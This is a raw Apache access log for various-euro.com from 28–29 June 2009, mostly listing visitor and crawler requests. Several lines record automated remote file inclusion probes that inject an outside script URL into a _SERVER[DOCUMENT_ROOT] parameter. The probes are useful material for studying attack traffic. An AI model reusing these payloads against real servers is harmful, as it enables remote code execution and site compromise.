74.182.40.223 - - [28/Jun/2009:18:33:51 +0200] "GET /framez_0.html HTTP/1.1" 200 12285 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:53 +0200] "GET /framez.html HTTP/1.1" 200 3959 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /frame-menu.html HTTP/1.1" 200 10500 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 7688 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:54 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:26 +0200] "GET /snapshots.html HTTP/1.1" 200 4259 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET / HTTP/1.1" 302 353 "http://www.google.com/search?client=safari&rls=de-de&q=zampa+di+leone&ie=UTF-8&oe=UTF-8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.google.com/search?client=safari&rls=de-de&q=zampa+di+leone&ie=UTF-8&oe=UTF-8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [28/Jun/2009:18:34:28 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.182.40.223 - - [28/Jun/2009:18:34:26 +0200] "GET /snapshots/P4260036-1-35-MX-1.JPG HTTP/1.1" 200 6335526 "http://www.various-euro.com/snapshots.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:26 +0200] "GET /snapshots/P4260036-1-35-MX-1-0-1-1-1-1-V.JPG HTTP/1.1" 200 5728264 "http://www.various-euro.com/snapshots.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:26 +0200] "GET /snapshots/P4260036-1-35-MX-1-0-1-1-1-1-V-2.JPG HTTP/1.1" 200 5670394 "http://www.various-euro.com/snapshots.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:26 +0200] "GET /snapshots/P4260036-1-35-MX-1-V-2.JPG HTTP/1.1" 200 6327782 "http://www.various-euro.com/snapshots.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:46 +0200] "GET /f-horrorkatze.html HTTP/1.1" 200 7865 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /bannerz/gras.jpg HTTP/1.1" 200 15895 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /bannerz/horrorkatze/teGIFT.JPG HTTP/1.1" 200 4873 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /sound/KEYWEST.MID HTTP/1.1" 404 2748 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /bannerz/horrorkatze/struct-fotoalbum.mpg HTTP/1.1" 200 25146 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /bannerz/horrorkatze/kontext-inform.mpg HTTP/1.1" 200 96263 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:48 +0200] "GET /bannerz/horrorkatze/struct-fotoalbum.mpg HTTP/1.1" 206 25146 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:48 +0200] "GET /bannerz/horrorkatze/kontext-inform.mpg HTTP/1.1" 206 96263 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:34:47 +0200] "GET /bannerz/horrorkatze/EAT.gif HTTP/1.1" 200 89369 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.6.18.228 - - [28/Jun/2009:18:44:02 +0200] "GET /framez_0.html HTTP/1.0" 200 12285 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.167 - - [28/Jun/2009:19:00:57 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.232.143.149 - - [28/Jun/2009:19:25:28 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 302 429 "-" "libwww-perl/5.79"
66.232.143.149 - - [28/Jun/2009:19:25:29 +0200] "GET /zampa/?_SERVER%5bDOCUMENT_ROOT%5d=http://www.daftarwarisan.gov.my/img/ec.txt%3f%3f HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"
66.232.143.149 - - [28/Jun/2009:19:39:08 +0200] "GET /framez.html/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 200 3959 "-" "libwww-perl/5.79"
66.232.143.149 - - [28/Jun/2009:19:39:09 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 200 7869 "-" "libwww-perl/5.79"
193.252.118.176 - - [28/Jun/2009:19:50:14 +0200] "GET /neon/click.html HTTP/1.1" 200 521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.18.228 - - [28/Jun/2009:19:52:55 +0200] "GET /neon/behindd.html HTTP/1.0" 200 476 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.18.31 - - [28/Jun/2009:20:21:28 +0200] "GET /framez.html/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 200 3959 "-" "libwww-perl/5.65"
218.38.18.31 - - [28/Jun/2009:20:21:30 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 200 7869 "-" "libwww-perl/5.65"
74.6.18.228 - - [28/Jun/2009:20:24:43 +0200] "GET /games/virtualcop/virtualcop.html HTTP/1.0" 200 4487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.51.115 - - [28/Jun/2009:20:33:27 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.115 - - [28/Jun/2009:20:33:27 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.139 - - [28/Jun/2009:20:35:55 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.6.18.228 - - [28/Jun/2009:20:42:12 +0200] "GET /search.html HTTP/1.0" 200 1440 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.118.175 - - [28/Jun/2009:20:49:57 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.18.228 - - [28/Jun/2009:20:54:30 +0200] "GET /left-one-new.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.14.199.8 - - [28/Jun/2009:20:56:27 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
72.14.199.85 - - [28/Jun/2009:20:56:28 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
74.6.18.228 - - [28/Jun/2009:21:01:07 +0200] "GET /neon/click.html HTTP/1.0" 200 521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.118.173 - - [28/Jun/2009:21:14:36 +0200] "GET /neon/euro.html HTTP/1.1" 200 2212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.174 - - [28/Jun/2009:21:16:24 +0200] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
38.103.63.62 - - [28/Jun/2009:21:35:46 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
74.6.18.228 - - [28/Jun/2009:22:20:11 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:22:20:11 +0200] "GET /f-sponsor.html HTTP/1.0" 200 8578 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:22:22:52 +0200] "GET /3dsf3/sendi/catastrophe.html HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:22:22:52 +0200] "GET /3dsf3/sendi/formate.css HTTP/1.0" 200 474 "http://www.various-euro.com/3dsf3/sendi/catastrophe.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
92.51.157.168 - - [28/Jun/2009:23:01:39 +0200] "GET /robots.txt HTTP/1.1" 200 64 "http://smart.apnoti.com" "smart.apnoti.com Robot/v1.34 (http://smart.apnoti.com/index/aboutApnotiWebCrawler)"
92.51.157.168 - - [28/Jun/2009:23:01:39 +0200] "GET / HTTP/1.1" 200 7869 "http://smart.apnoti.com" "smart.apnoti.com Robot/v1.34 (http://smart.apnoti.com/index/aboutApnotiWebCrawler)"
81.52.143.33 - - [28/Jun/2009:23:05:32 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.33 - - [28/Jun/2009:23:05:36 +0200] "GET /bmpp/18.html HTTP/1.1" 200 4467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 200 47879 "http://www.various-euro.com/zampa/montenegro/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:12:51 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:13:16 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:13:17 +0200] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:13:19 +0200] "GET / HTTP/1.1" 302 353 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:13:19 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:14:20 +0200] "GET /zampa/slike/E7MEDIAA.GIF HTTP/1.1" 200 44716 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.140.71.92 - - [28/Jun/2009:23:15:48 +0200] "GET /zampa/slike/E3VAMPIR.GIF HTTP/1.1" 200 52553 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
193.252.118.174 - - [28/Jun/2009:23:17:17 +0200] "GET /neon/girlz3.html HTTP/1.1" 200 2479 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.18.228 - - [28/Jun/2009:23:38:19 +0200] "GET /left-one-new.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.227 - - [28/Jun/2009:23:41:38 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.211.163 - - [28/Jun/2009:23:46:15 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.163 - - [28/Jun/2009:23:46:15 +0200] "GET /f-zeug.html HTTP/1.1" 200 59462 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
123.125.66.56 - - [28/Jun/2009:23:46:39 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.41 - - [28/Jun/2009:23:47:40 +0200] "GET /frame-menu.html HTTP/1.1" 200 10500 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.19 - - [28/Jun/2009:23:48:42 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 7688 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.33 - - [28/Jun/2009:23:49:43 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.14.199.8 - - [28/Jun/2009:23:56:45 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
72.14.199.85 - - [28/Jun/2009:23:56:59 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
94.222.120.252 - - [29/Jun/2009:00:03:45 +0200] "GET / HTTP/1.1" 302 353 "http://www.google.com/search?client=safari&rls=de-de&q=zapa+di+Leone&ie=UTF-8&oe=UTF-8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
94.222.120.252 - - [29/Jun/2009:00:03:46 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.google.com/search?client=safari&rls=de-de&q=zapa+di+Leone&ie=UTF-8&oe=UTF-8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
193.252.149.14 - - [29/Jun/2009:00:08:46 +0200] "GET /DgH/ HTTP/1.1" 200 5024 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.106.209 - - [29/Jun/2009:00:13:41 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.209 - - [29/Jun/2009:00:13:41 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.210.175.153 - - [29/Jun/2009:00:53:49 +0200] "GET /framez-schubb5.html HTTP/1.0" 200 4330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
193.252.149.13 - - [29/Jun/2009:00:54:43 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.72.227 - - [29/Jun/2009:01:04:24 +0200] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.18.228 - - [29/Jun/2009:01:05:22 +0200] "GET /framez.html HTTP/1.0" 200 3959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [29/Jun/2009:01:05:25 +0200] "GET /style/various-euro.css HTTP/1.0" 304 - "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [29/Jun/2009:01:05:35 +0200] "GET /frame-menu.html HTTP/1.0" 200 10500 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [29/Jun/2009:01:05:35 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 7688 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [29/Jun/2009:01:05:35 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.233.2.13 - - [29/Jun/2009:01:07:18 +0200] "HEAD / HTTP/1.1" 302 - "-" "WordPress.com mShots; http://support.wordpress.com/contact/"
72.233.2.13 - - [29/Jun/2009:01:07:19 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "WordPress.com mShots; http://support.wordpress.com/contact/"
72.233.2.13 - - [29/Jun/2009:01:07:19 +0200] "GET / HTTP/1.1" 302 353 "-" "Python-urllib/2.5"
72.233.2.13 - - [29/Jun/2009:01:07:19 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Python-urllib/2.5"
72.233.2.13 - - [29/Jun/2009:01:07:20 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) pythumbnail.py"
72.233.2.13 - - [29/Jun/2009:01:07:20 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://zampa.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) pythumbnail.py"
72.233.2.13 - - [29/Jun/2009:01:07:21 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) pythumbnail.py"
72.233.2.13 - - [29/Jun/2009:01:07:21 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) pythumbnail.py"
72.233.2.13 - - [29/Jun/2009:01:07:21 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/525.1+ (KHTML, like Gecko, Safari/525.1+) pythumbnail.py"
81.52.143.37 - - [29/Jun/2009:01:14:37 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
